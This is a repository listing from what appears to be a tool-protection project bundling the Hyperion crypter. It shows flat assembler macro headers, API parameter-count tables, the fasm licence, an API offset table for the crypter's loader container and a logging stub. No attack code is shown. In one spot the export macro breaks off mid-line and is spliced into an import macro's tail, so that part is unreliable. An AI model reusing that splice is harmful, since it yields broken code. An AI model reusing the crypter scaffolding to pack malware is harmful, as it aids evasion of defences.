8 | __encoding:: ; names this block so 'load ... from __encoding:offset' can read it later
9 | times 80h dw %-1 ; bytes 00h-7Fh map to themselves
10 | dw 20ACh,?,?,?,?,2026h,?,?,?,?,?,?,?,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,?,?,?,?,?,?,?
12 | times 60h dw 0E00h+%-1 ; bytes 0A0h-0FFh map to 0E00h-0E5Fh. NOTE(review): byte 0A0h gets 0E00h here; code page 874 assigns U+00A0 to it - confirm
13 | end virtual ; '?' leaves the entry for an unassigned byte undefined
14 |
15 | macro du [arg] ; wraps the built-in du: emits arg, then remaps string characters above 7Fh through the __encoding table
16 | { local offset,char
17 | offset = $-$$ ; where this item starts, relative to the section base
18 | du arg ; inside its own body the name still means the original directive
19 | if arg eqtype '' ; only quoted strings are remapped
20 | repeat ($-offset-$$)/2 ; once per 16-bit unit just emitted
21 | load char byte from $$+offset+(%-1)*2 ; first byte of the unit = the code-page byte
22 | if char > 7Fh
23 | load char word from __encoding:char*2 ; table lookup
24 | store word char at $$+offset+(%-1)*2 ; overwrite the emitted unit with the mapped value
25 | end if
26 | end repeat
27 | end if }
28 |
29 | struc du [args] ; labelled form 'name du ...': defines name as a word label, then emits through the du macro of this file
30 | { common label . word
31 | du args }
32 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/MACRO/COM32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Macroinstructions for interfacing the COM (Component Object Model) classes
3 |
4 | macro cominvk object,proc,[arg] ; calls method 'proc' on the COM object whose pointer is stored at [object]
5 | { common
6 | if ~ arg eq ; only when arguments were given
7 | reverse ; arguments are handled last-to-first
8 | pushd arg ; pushd is defined outside this file (presumably MACRO/PROC32.INC)
9 | common
10 | end if
11 | assert defined object#.com.object ; must be a COM object
12 | mov eax,[object]
13 | push eax ; the object pointer goes on the stack after the arguments
14 | mov eax,[eax] ; first dword of the object = address of its method table
15 | call [eax+object#.#proc] } ; offset set by the 'interface' macro; eax is overwritten and [object] is not checked for null
16 |
17 | macro comcall handle,interface,proc,[arg] ; calls method 'proc' of 'interface' on the object pointer given as 'handle'
18 | { common
19 | if ~ arg eq ; only when arguments were given
20 | reverse ; arguments are handled last-to-first
21 | pushd arg ; pushd is defined outside this file (presumably MACRO/PROC32.INC)
22 | common
23 | end if
24 | assert defined interface#.com.interface ; must be a COM interface
25 | if handle eqtype eax | handle eqtype 0 ; handle is a register or a numeric expression
26 | push handle
27 | local ..handle
28 | label ..handle at handle ; lets [..handle] address the memory that handle points to
29 | mov eax,[..handle] ; method table address
30 | else
31 | mov eax,handle
32 | push eax
33 | mov eax,[eax] ; method table address
34 | end if
35 | call [eax+interface#.#proc] } ; eax is overwritten; the handle is not checked for null
36 |
37 | macro interface name,[proc] ; declares a COM interface: gives each listed method its offset in the method table
38 | { common
39 | struc name \{ ; 'label name' declares an object of this interface
40 | match , @struct \\{ define field@struct .,name, \\} ; taken when @struct is empty (@struct comes from MACRO/STRUCT.INC, not shown)
41 | match no, @struct \\{ . dd ? ; taken when @struct is 'no': reserves one dword for the object pointer
42 | virtual at 0
43 | forward
44 | .#proc dd ? ; per-object method offsets
45 | common
46 | .\#\\.com.object = name#.com.interface ; the symbol that cominvk asserts on
47 | end virtual \\} \}
48 | virtual at 0
49 | forward
50 | name#.#proc dd ? ; one dword slot per method, in declaration order
51 | common
52 | name#.com.interface = $ shr 2 ; number of slots (size / 4); the symbol that comcall asserts on
53 | end virtual }
54 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/MACRO/COM64.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Macroinstructions for interfacing the COM (Component Object Model) classes
3 |
4 | macro cominvk object,proc,[arg] ; calls method 'proc' on the COM object whose pointer is stored at [object]
5 | { common
6 | assert defined object#.com.object ; must be a COM object
7 | macro call dummy ; temporary replacement for 'call', so the fastcall below ends in the indirect call sequence
8 | \{ mov rax,[object]
9 | mov rax,[rax] ; first qword of the object = address of its method table
10 | call [rax+object#.#proc] \} ; offset set by the 'interface' macro; [object] is not checked for null
11 | fastcall ,[object],arg ; fastcall is defined outside this file (presumably MACRO/PROC64.INC); [object] is passed ahead of arg
12 | purge call } ; removes the temporary 'call' macro
13 |
14 | macro comcall handle,interface,proc,[arg] ; calls method 'proc' of 'interface' on the object pointer given as 'handle'
15 | { common
16 | assert defined interface#.com.interface ; must be a COM interface
17 | macro call dummy ; temporary replacement for 'call', so the fastcall below ends in the indirect call sequence
18 | \{ if handle eqtype rax | handle eqtype 0 ; handle is a register or a numeric expression
19 | local ..handle
20 | label ..handle at handle ; lets [..handle] address the memory that handle points to
21 | mov rax,[..handle] ; method table address
22 | else
23 | mov rax,handle
24 | mov rax,[rax] ; method table address
25 | end if
26 | call [rax+interface#.#proc] \} ; the handle is not checked for null
27 | fastcall ,handle,arg ; fastcall is defined outside this file (presumably MACRO/PROC64.INC); handle is passed ahead of arg
28 | purge call } ; removes the temporary 'call' macro
29 |
30 | macro interface name,[proc] ; declares a COM interface: gives each listed method its offset in the method table
31 | { common
32 | struc name \{ ; 'label name' declares an object of this interface
33 | match , @struct \\{ define field@struct .,name, \\} ; taken when @struct is empty (@struct comes from MACRO/STRUCT.INC, not shown)
34 | match no, @struct \\{ . dq ? ; taken when @struct is 'no': reserves one qword for the object pointer
35 | virtual at 0
36 | forward
37 | .#proc dq ? ; per-object method offsets
38 | common
39 | .\#\\.com.object = name#.com.interface ; the symbol that cominvk asserts on
40 | end virtual \\} \}
41 | virtual at 0
42 | forward
43 | name#.#proc dq ? ; one qword slot per method, in declaration order
44 | common
45 | name#.com.interface = $ shr 3 ; number of slots (size / 8); the symbol that comcall asserts on
46 | end virtual }
47 |
48 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/MACRO/EXPORT.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Macroinstruction for making export section
3 |
4 | macro export dllname,[label,string] ; builds the export directory from label,'name' pairs
5 | { common
6 | local module,addresses,names,ordinal,count
7 | count = 0
8 | forward
9 | count = count+1 ; number of label,string pairs
10 | common
11 | dd 0,0,0,RVA module,1 ; three zero fields, RVA of the DLL name, ordinal base 1
12 | dd count,count,RVA addresses,RVA names,RVA ordinal ; function count, name count, then the three table RVAs
13 | addresses:
14 | forward
15 | dd RVA label ; address table, one entry per export
16 | common
17 | names:
18 | forward
19 | local name
20 | dd RVA name ; name pointer table
21 | common
22 | ordinal: count = 0
23 | forward
24 | dw count ; ordinal table: 0,1,2,... in declaration order
25 | count = count+1
26 | common
27 | module db dllname,0
28 | forward
29 | name db string,0 ; zero-terminated export names
30 | common
31 | local x,y,z,str1,str2,v1,v2
32 | x = count shr 1 ; from here: compares name strings pairwise at distance x, starting at count/2 - looks like the start of a sort of the name table
33 | while x > 0
34 | y = x
35 | while y < count
36 | z = y
37 | while z-x >= 0
38 | load v1 dword from names+z*4
39 | str1=($-RVA $)+v1 ; turns the stored RVA back into an assembly-time address
40 | load v2 dword from names+(z-x)*4
41 | str2=($-RVA $)+v2
42 | while v1 > 0 ; walk both strings until they differ or the first one ends
43 | load v1 from str1+%-1
44 | load v2 from str2+%-1
45 | if v1 <> v2
46 | break
47 | end if
48 | end while
49 | if v1 name#.lookup ; NOTE(review): text is missing from this listing between 'if v1' and 'name#.lookup'. The line numbers restart at 41 below, so the rest of 'export' and the start of the next file are lost.
41 | name#.redundant = 0 ; from here on the lines match the tail of an 'import' macro with 32-bit entries (presumably MACRO/IMPORT32.INC) - confirm against the upstream files
42 | dd 0
43 | else
44 | name#.redundant = 1
45 | end if
46 | name#.address:
47 | forward
48 | if used label
49 | if string eqtype ''
50 | label dd RVA _label
51 | else
52 | label dd 80000000h + string ; numeric 'string': import by ordinal, flagged by the top bit
53 | end if
54 | end if
55 | common
56 | if ~ name#.redundant
57 | dd 0
58 | end if
59 | forward
60 | if used label & string eqtype ''
61 | _label dw 0
62 | db string,0
63 | rb RVA $ and 1
64 | end if
65 | common
66 | end if }
67 |
68 | macro api [name] {} ; default no-op; headers such as WIN32A.INC / WIN32W.INC define their own 'api' that aliases suffix-less names
69 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/MACRO/IMPORT64.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Macroinstructions for making import section (64-bit)
3 |
4 | macro library [name,string] ; emits the import directory: one 5-dword entry per library that has at least one used import
5 | { common
6 | import.data:
7 | forward
8 | local _label
9 | if defined name#.redundant ; set by the 'import' macro for this library
10 | if ~ name#.redundant
11 | dd RVA name#.lookup,0,0,RVA _label,RVA name#.address ; lookup table, two zero fields, DLL name, address table
12 | end if
13 | end if
14 | name#.referred = 1 ; tells the matching 'import' that the library was listed
15 | common
16 | dd 0,0,0,0,0 ; all-zero entry ends the directory
17 | forward
18 | if defined name#.redundant
19 | if ~ name#.redundant
20 | _label db string,0 ; DLL file name
21 | rb RVA $ and 1 ; pad to an even RVA
22 | end if
23 | end if }
24 |
25 | macro import name,[label,string] ; emits the lookup and address tables for library 'name' from label,'name' (or label,ordinal) pairs
26 | { common ; only labels the program references get an entry, so the import table lists just the APIs in use
27 | rb (- rva $) and 7 ; align to 8 bytes
28 | if defined name#.referred ; library was named in a 'library' statement
29 | name#.lookup:
30 | forward
31 | if used label
32 | if string eqtype '' ; quoted string: import by name
33 | local _label
34 | dq RVA _label
35 | else ; number: import by ordinal, flagged by the top bit
36 | dq 8000000000000000h + string
37 | end if
38 | end if
39 | common
40 | if $ > name#.lookup ; at least one entry was emitted
41 | name#.redundant = 0
42 | dq 0 ; zero entry ends the lookup table
43 | else
44 | name#.redundant = 1 ; nothing used: 'library' leaves this DLL out
45 | end if
46 | name#.address:
47 | forward
48 | if used label
49 | if string eqtype ''
50 | label dq RVA _label ; the label is the address-table slot itself
51 | else
52 | label dq 8000000000000000h + string
53 | end if
54 | end if
55 | common
56 | if ~ name#.redundant
57 | dq 0 ; zero entry ends the address table
58 | end if
59 | forward
60 | if used label & string eqtype ''
61 | _label dw 0 ; 16-bit hint, left at zero
62 | db string,0
63 | rb RVA $ and 1 ; pad to an even RVA
64 | end if
65 | common
66 | end if }
67 |
68 | macro api [name] {} ; default no-op; presumably overridden by the including header, as WIN32A.INC / WIN32W.INC do for the 32-bit set
69 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/MACRO/MASM.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Simulate MASM's syntax
3 |
4 | struc struct ; MASM form 'name struct': opens a structure called name
5 | { struct . ; 'struct' itself is defined outside this file (presumably MACRO/STRUCT.INC)
6 | name@struct equ . } ; remembered so that 'name ends' can be matched against it
7 |
8 | struc ends ; MASM form 'name ends': closes the structure only when name equals the one recorded in name@struct
9 | { match =.,name@struct \{ ends \} }
10 |
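11 | struc proc [params] ; MASM form 'name proc params': opens a procedure called name
12 | { common define@proc .,<params> ; angle brackets keep the whole parameter list as one argument; define@proc is defined outside this file
13 | name@proc equ . } ; remembered so that 'name endp' can be matched against it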
14 |
15 | struc endp ; MASM form 'name endp': closes the procedure only when name equals the one recorded in name@proc
16 | { match =.,name@proc \{ endp \} }
17 |
18 | macro option setting ; MASM-style 'option prologue:NAME' / 'option epilogue:NAME'
19 | { match =prologue:macro, setting \{ prologue@proc equ macro \} ; 'macro' here is the match variable holding NAME
20 | match =epilogue:macro, setting \{ epilogue@proc equ macro \} } ; any other setting matches neither pattern and does nothing
21 |
22 | macro none procname,flag,parmbytes,localbytes,reglist { } ; empty five-argument macro; presumably the target of 'option prologue:none' / 'option epilogue:none'
23 |
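24 | macro assume params ; MASM-style 'assume reg:struct': makes the fields of struct usable as names relative to reg
25 | {
26 | local expr
27 | define expr params
28 | match reg:struct, expr
29 | \{
30 | match assumed, reg\#@assumed \\{ irp name, assumed \\\{ restore name \\\} \\} ; drop the names left by an earlier assume on this register
31 | macro label . \\{ local def ; while the structure is instantiated below, 'label' and the data directives are routed to def@assumed
32 | define def .
33 | match =reg =at label, def \\\{ define def \\\}
34 | match name at,def \\\{ def@assumed reg,name,label at
35 | define def \\\}
36 | match name,def \\\{ def@assumed reg,.,: \\\} \\}
37 | struc db [val] \\{ \common def@assumed reg,.,<db val> \\} ; the directive and its values are passed on as one bracketed argument, like 'rb cnt' below
38 | struc dw [val] \\{ \common def@assumed reg,.,<dw val> \\}
39 | struc dp [val] \\{ \common def@assumed reg,.,<dp val> \\}
40 | struc dd [val] \\{ \common def@assumed reg,.,<dd val> \\}
41 | struc dt [val] \\{ \common def@assumed reg,.,<dt val> \\}
42 | struc dq [val] \\{ \common def@assumed reg,.,<dq val> \\}
43 | struc rb cnt \\{ def@assumed reg,.,rb cnt \\}
44 | struc rw cnt \\{ def@assumed reg,.,rw cnt \\}
45 | struc rp cnt \\{ def@assumed reg,.,rp cnt \\}
46 | struc rd cnt \\{ def@assumed reg,.,rd cnt \\}
47 | struc rt cnt \\{ def@assumed reg,.,rt cnt \\}
48 | struc rq cnt \\{ def@assumed reg,.,rq cnt \\}
49 | reg\#@assumed equ ; start from an empty list of assumed names
50 | virtual at reg
51 | reg struct ; instantiate the structure at address reg; its fields go through the overrides above
52 | end virtual
53 | purge label
54 | restruc db,dw,dp,dd,dt,dq ; remove the temporary overrides
55 | restruc rb,rw,rp,rd,rt,rq \} }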
56 |
57 | macro def@assumed reg,name,def ; records 'name' in the reg@assumed list and defines it as a fresh local label using 'def'
58 | { match vars, reg#@assumed \{ reg#@assumed equ reg#@assumed, \} ; append a comma first when the list is not empty
59 | reg#@assumed equ reg#@assumed name
60 | local ..label
61 | name equ ..label ; name now stands for the local label; 'assume' undoes this later with restore
62 | ..label def }
63 |
64 | struc label type { label . type } ; MASM form 'name label type', mapped to 'label name type'
65 |
66 | struc none { label . } ; 'name none' only defines name as a label
67 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/PCOUNT/COMCTL32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; COMCTL32 API calls parameters' count
3 | ; Each 'Name% = N' sets an assembly-time constant: the number of parameters of that API call. Presumably read by the call macros to check argument counts - confirm.
4 | CreateMappedBitmap% = 5
5 | CreatePropertySheetPage% = 1
6 | CreateStatusWindow% = 4
7 | CreateToolbar% = 8
8 | CreateToolbarEx% = 13
9 | CreateUpDownControl% = 12
10 | DestroyPropertySheetPage% = 1
11 | DrawInsert% = 3
12 | DrawStatusText% = 4
13 | FlatSB_EnableScrollBar% = 3
14 | FlatSB_GetScrollInfo% = 3
15 | FlatSB_GetScrollPos% = 2
16 | FlatSB_GetScrollProp% = 3
17 | FlatSB_GetScrollRange% = 4
18 | FlatSB_SetScrollInfo% = 4
19 | FlatSB_SetScrollPos% = 4
20 | FlatSB_SetScrollProp% = 4
21 | FlatSB_SetScrollRange% = 5
22 | FlatSB_ShowScrollBar% = 3
23 | GetEffectiveClientRect% = 3
24 | ImageList_Add% = 3
25 | ImageList_AddIcon% = 2
26 | ImageList_AddMasked% = 3
27 | ImageList_BeginDrag% = 4
28 | ImageList_Copy% = 5
29 | ImageList_Create% = 5
30 | ImageList_Destroy% = 1
31 | ImageList_DragEnter% = 3
32 | ImageList_DragLeave% = 1
33 | ImageList_DragMove% = 2
34 | ImageList_DragShowNolock% = 1
35 | ImageList_Draw% = 6
36 | ImageList_DrawEx% = 10
37 | ImageList_DrawIndirect% = 1
38 | ImageList_Duplicate% = 1
39 | ImageList_EndDrag% = 0
40 | ImageList_GetBkColor% = 1
41 | ImageList_GetDragImage% = 2
42 | ImageList_GetIcon% = 3
43 | ImageList_GetIconSize% = 3
44 | ImageList_GetImageCount% = 1
45 | ImageList_GetImageInfo% = 3
46 | ImageList_GetImageRect% = 3
47 | ImageList_LoadImage% = 7
48 | ImageList_Merge% = 6
49 | ImageList_Read% = 1
50 | ImageList_Remove% = 2
51 | ImageList_Replace% = 4
52 | ImageList_ReplaceIcon% = 3
53 | ImageList_SetBkColor% = 2
54 | ImageList_SetDragCursorImage% = 4
55 | ImageList_SetFilter% = 3
56 | ImageList_SetIconSize% = 3
57 | ImageList_SetImageCount% = 2
58 | ImageList_SetOverlayImage% = 3
59 | ImageList_Write% = 2
60 | InitCommonControls% = 0
61 | InitCommonControlsEx% = 1
62 | InitializeFlatSB% = 1
63 | LBItemFromPt% = 4
64 | MakeDragList% = 1
65 | MenuHelp% = 7
66 | PropertySheet% = 1
67 | ShowHideMenuCtl% = 3
68 | UninitializeFlatSB% = 1
69 | _TrackMouseEvent% = 1
70 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/PCOUNT/COMDLG32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; COMDLG32 API calls parameters' count
3 | ; Each 'Name% = N' sets an assembly-time constant: the number of parameters of that API call. Names carry no A/W suffix.
4 | ChooseColor% = 1
5 | ChooseFont% = 1
6 | CommDlgExtendedError% = 0
7 | FindText% = 1
8 | FormatCharDlgProc% = 4
9 | GetFileTitle% = 3
10 | GetOpenFileName% = 1
11 | GetSaveFileName% = 1
12 | LoadAlterBitmap% = 3
13 | PageSetupDlg% = 1
14 | PrintDlg% = 1
15 | ReplaceText% = 1
16 | WantArrows% = 4
17 | dwLBSubclass% = 4
18 | dwOKSubclass% = 4
19 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/PCOUNT/SHELL32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; SHELL32 API calls parameters' count
3 | ; Each 'Name% = N' sets an assembly-time constant: the number of parameters of that API call. Names carry no A/W suffix.
4 | CheckEscapes% = 2
5 | DoEnvironmentSubst% = 2
6 | DragAcceptFiles% = 2
7 | DragFinish% = 1
8 | DragQueryFile% = 4
9 | DragQueryPoint% = 2
10 | DuplicateIcon% = 2
11 | ExtractAssociatedIcon% = 3
12 | ExtractAssociatedIconEx% = 4
13 | ExtractIcon% = 3
14 | ExtractIconEx% = 5
15 | ExtractIconResInfo% = 5
16 | FindExeDlgProc% = 4
17 | FindExecutable% = 3
18 | FreeIconList% = 2
19 | InternalExtractIconList% = 3
20 | RealShellExecute% = 10
21 | RealShellExecuteEx% = 11
22 | RegenerateUserEnvironment% = 2
23 | SHAddToRecentDocs% = 2
24 | SHAppBarMessage% = 2
25 | SHBrowseForFolder% = 1
26 | SHChangeNotify% = 4
27 | SHEmptyRecycleBin% = 3
28 | SHFileOperation% = 1
29 | SHFormatDrive% = 4
30 | SHFreeNameMappings% = 1
31 | SHGetDataFromIDList% = 5
32 | SHGetDesktopFolder% = 1
33 | SHGetDiskFreeSpace% = 4
34 | SHGetFileInfo% = 5
35 | SHGetInstanceExplorer% = 1
36 | SHGetMalloc% = 1
37 | SHGetNewLinkInfo% = 5
38 | SHGetPathFromIDList% = 2
39 | SHGetSettings% = 2
40 | SHGetSpecialFolderLocation% = 3
41 | SHGetSpecialFolderPath% = 4
42 | SHInvokePrinterCommand% = 5
43 | SHLoadInProc% = 1
44 | SHQueryRecycleBin% = 2
45 | SHUpdateRecycleBinIcon% = 0
46 | SheChangeDir% = 1
47 | SheChangeDirEx% = 1
48 | SheFullPath% = 3
49 | SheGetCurDrive% = 0
50 | SheGetDir% = 2
51 | SheRemoveQuotes% = 1
52 | SheSetCurDrive% = 1
53 | SheShortenPath% = 2
54 | ShellAbout% = 4
55 | ShellExecute% = 6
56 | ShellExecuteEx% = 1
57 | ShellHookProc% = 3
58 | Shell_NotifyIcon% = 2
59 | StrChr% = 2
60 | StrChrI% = 2
61 | StrCmpN% = 3
62 | StrCmpNI% = 3
63 | StrCpyN% = 3
64 | StrNCmp% = 3
65 | StrNCmpI% = 3
66 | StrNCpy% = 3
67 | StrRChr% = 3
68 | StrRChrI% = 3
69 | StrRStr% = 3
70 | StrRStrI% = 3
71 | StrStr% = 2
72 | StrStrI% = 2
73 | WOWShellExecute% = 7
74 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/PCOUNT/WSOCK32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; WSOCK32 API calls parameters' count
3 | ; Each 'Name% = N' sets an assembly-time constant: the number of parameters of that API call.
4 | AcceptEx% = 8
5 | EnumProtocols% = 3
6 | GetAcceptExSockaddrs% = 8
7 | GetAddressByName% = 10
8 | GetNameByType% = 3
9 | GetService% = 7
10 | GetTypeByName% = 2
11 | MigrateWinsockConfiguration% = 3
12 | NPLoadNameSpaces% = 3
13 | SetService% = 6
14 | TransmitFile% = 7
15 | WEP% = 0
16 | WSAAsyncGetHostByAddr% = 7
17 | WSAAsyncGetHostByName% = 5
18 | WSAAsyncGetProtoByName% = 5
19 | WSAAsyncGetProtoByNumber% = 5
20 | WSAAsyncGetServByName% = 6
21 | WSAAsyncGetServByPort% = 6
22 | WSACancelAsyncRequest% = 4
23 | WSACancelBlockingCall% = 0
24 | WSACleanup% = 0
25 | WSAGetLastError% = 0
26 | WSAIsBlocking% = 0
27 | WSARecvEx% = 4
28 | WSASetBlockingHook% = 1
29 | WSASetLastError% = 1
30 | WSAStartup% = 2
31 | WSAUnhookBlockingHook% = 0
32 | __WSAFDIsSet% = 2
33 | accept% = 3
34 | bind% = 3
35 | closesocket% = 1
36 | connect% = 3
37 | dn_expand% = 5
38 | gethostbyaddr% = 3
39 | gethostbyname% = 1
40 | gethostname% = 2
41 | getnetbyname% = 1
42 | getpeername% = 3
43 | getprotobyname% = 1
44 | getprotobynumber% = 1
45 | getservbyname% = 2
46 | getservbyport% = 2
47 | getsockname% = 3
48 | getsockopt% = 5
49 | htonl% = 1
50 | htons% = 1
51 | inet_addr% = 1
52 | inet_network% = 1
53 | inet_ntoa% = 1
54 | ioctlsocket% = 3
55 | listen% = 2
56 | ntohl% = 1
57 | ntohs% = 1
58 | rcmd% = 6
59 | recv% = 4
60 | recvfrom% = 6
61 | rexec% = 6
62 | rresvport% = 1
63 | s_perror% = 2
64 | select% = 5
65 | send% = 4
66 | sendto% = 6
67 | sethostname% = 2
68 | setsockopt% = 5
69 | shutdown% = 2
70 | socket% = 3
71 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/WIN32A.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win32 programming headers (ASCII)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc32.inc'
6 | include 'macro/com32.inc'
7 | include 'macro/import32.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
11 | struc TCHAR [val] { common match any, val \{ . db val \} ; ASCII headers: 'name TCHAR values' defines bytes
12 | match , val \{ . db ? \} } ; no value given: reserve one uninitialised byte
13 | sizeof.TCHAR = 1 ; size of one character in bytes
14 |
15 | include 'equates/kernel32.inc'
16 | include 'equates/user32.inc'
17 | include 'equates/gdi32.inc'
18 | include 'equates/comctl32.inc'
19 | include 'equates/comdlg32.inc'
20 | include 'equates/shell32.inc'
21 | include 'equates/wsock32.inc'
22 |
23 | macro api [name] { if used name
24 | label name dword at name#A
25 | end if }
26 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/WIN32W.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win32 programming headers (WideChar)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc32.inc'
6 | include 'macro/com32.inc'
7 | include 'macro/import32.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
; TCHAR data directive, WideChar variant: "label TCHAR values" emits the
; values with du (two bytes per character); with no values it reserves one
; uninitialised 16-bit unit.
struc TCHAR [val] { common match any, val \{ . du val \}
                           match , val \{ . du ? \} }
sizeof.TCHAR = 2        ; bytes per character in this variant

include 'equates/kernel32.inc'
include 'equates/user32.inc'
include 'equates/gdi32.inc'
include 'equates/comctl32.inc'
include 'equates/comdlg32.inc'
include 'equates/shell32.inc'
include 'equates/wsock32.inc'

; For each listed name that the program actually references, define the bare
; name as a dword label located at the "W"-suffixed symbol (Foo -> FooW).
macro api [name] { if used name
                    label name dword at name#W
                   end if }
26 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/WIN64A.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win64 programming headers (ASCII)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc64.inc'
6 | include 'macro/com64.inc'
7 | include 'macro/import64.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
; TCHAR data directive, ASCII variant: "label TCHAR values" emits the values
; with db (one byte per character); with no values it reserves one
; uninitialised byte.
struc TCHAR [val] { common match any, val \{ . db val \}
                           match , val \{ . db ? \} }
sizeof.TCHAR = 1        ; bytes per character in this variant

include 'equates/kernel64.inc'
include 'equates/user64.inc'
include 'equates/gdi64.inc'
include 'equates/comctl64.inc'
include 'equates/comdlg64.inc'
include 'equates/shell64.inc'

; For each listed name that the program actually references, define the bare
; name as a qword label located at the "A"-suffixed symbol (Foo -> FooA).
macro api [name] { if used name
                    label name qword at name#A
                   end if }
25 |
26 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/INCLUDE/WIN64W.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win64 programming headers (WideChar)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc64.inc'
6 | include 'macro/com64.inc'
7 | include 'macro/import64.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
; TCHAR data directive, WideChar variant: "label TCHAR values" emits the
; values with du (two bytes per character); with no values it reserves one
; uninitialised 16-bit unit.
struc TCHAR [val] { common match any, val \{ . du val \}
                           match , val \{ . du ? \} }
sizeof.TCHAR = 2        ; bytes per character in this variant

include 'equates/kernel64.inc'
include 'equates/user64.inc'
include 'equates/gdi64.inc'
include 'equates/comctl64.inc'
include 'equates/comdlg64.inc'
include 'equates/shell64.inc'

; For each listed name that the program actually references, define the bare
; name as a qword label located at the "W"-suffixed symbol (Foo -> FooW).
macro api [name] { if used name
                    label name qword at name#W
                   end if }
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/fasm.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Hyperion/Fasm/fasm.exe
--------------------------------------------------------------------------------
/contrib/Hyperion/Fasm/license.TXT:
--------------------------------------------------------------------------------
1 |
2 | flat assembler version 1.71
3 | Copyright (c) 1999-2016, Tomasz Grysztar.
4 | All rights reserved.
5 |
6 | This program is free for commercial and non-commercial use as long as
7 | the following conditions are adhered to.
8 |
9 | Copyright remains Tomasz Grysztar, and as such any Copyright notices
10 | in the code are not to be removed.
11 |
12 | Redistribution and use in source and binary forms, with or without
13 | modification, are permitted provided that the following conditions are
14 | met:
15 |
16 | 1. Redistributions of source code must retain the above copyright notice,
17 | this list of conditions and the following disclaimer.
18 | 2. Redistributions in binary form must reproduce the above copyright
19 | notice, this list of conditions and the following disclaimer in the
20 | documentation and/or other materials provided with the distribution.
21 |
22 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
23 | "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
24 | TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
25 | PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR
26 | CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
27 | EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
28 | PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
29 | PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
30 | LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
31 | NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
32 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
33 |
34 | The licence and distribution terms for any publically available
35 | version or derivative of this code cannot be changed. i.e. this code
36 | cannot simply be copied and put under another distribution licence
37 | (including the GNU Public Licence).
38 |
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/32/hyperion.inc:
--------------------------------------------------------------------------------
;Byte offsets into a table of API pointers. Every entry is the previous one
;plus 4, i.e. one 4-byte slot per API. The 32-bit payload on this page reads
;the slots as [table+offset], e.g. "stdcall dword [eax+VirtualAlloc]".
;The order below therefore has to match the order in which the table is
;filled (the code that fills it is not part of this file).
CreateFileMapping equ 0
MapViewOfFile equ CreateFileMapping + 4
UnmapViewOfFile equ MapViewOfFile + 4
CreateFile equ UnmapViewOfFile + 4
CloseHandle equ CreateFile + 4
GetFileSize equ CloseHandle + 4
DeleteFile equ GetFileSize + 4
GetModuleHandle equ DeleteFile + 4
VirtualAlloc equ GetModuleHandle + 4
VirtualProtect equ VirtualAlloc + 4
VirtualFree equ VirtualProtect + 4

;presumably lengths in bytes (inferred from the names - confirm at the use sites)
SIZE_DATA_SECTION_NAME equ 5
SIZE_CHECKSUM equ 4
--------------------------------------------------------------------------------
/contrib/Hyperion/Src/Container/32/logfile_disable.asm:
--------------------------------------------------------------------------------
;Logging disabled: each macro below keeps the name and parameters of a
;logging macro but expands to "mov eax,1" only, so no log file is touched.
;The one-line descriptions say what the macro stands in for (presumably the
;behaviour of a logging-enabled counterpart that is not shown here).

;writes a string and a newline to the logfile
;here: still invokes char_sequence on char_buffer, then sets eax to 1;
;error_exit is accepted but unused
macro writeWithNewLine char_sequence, char_buffer, error_exit{
        char_sequence char_buffer
        mov eax,1
}

;write a string to the logfile
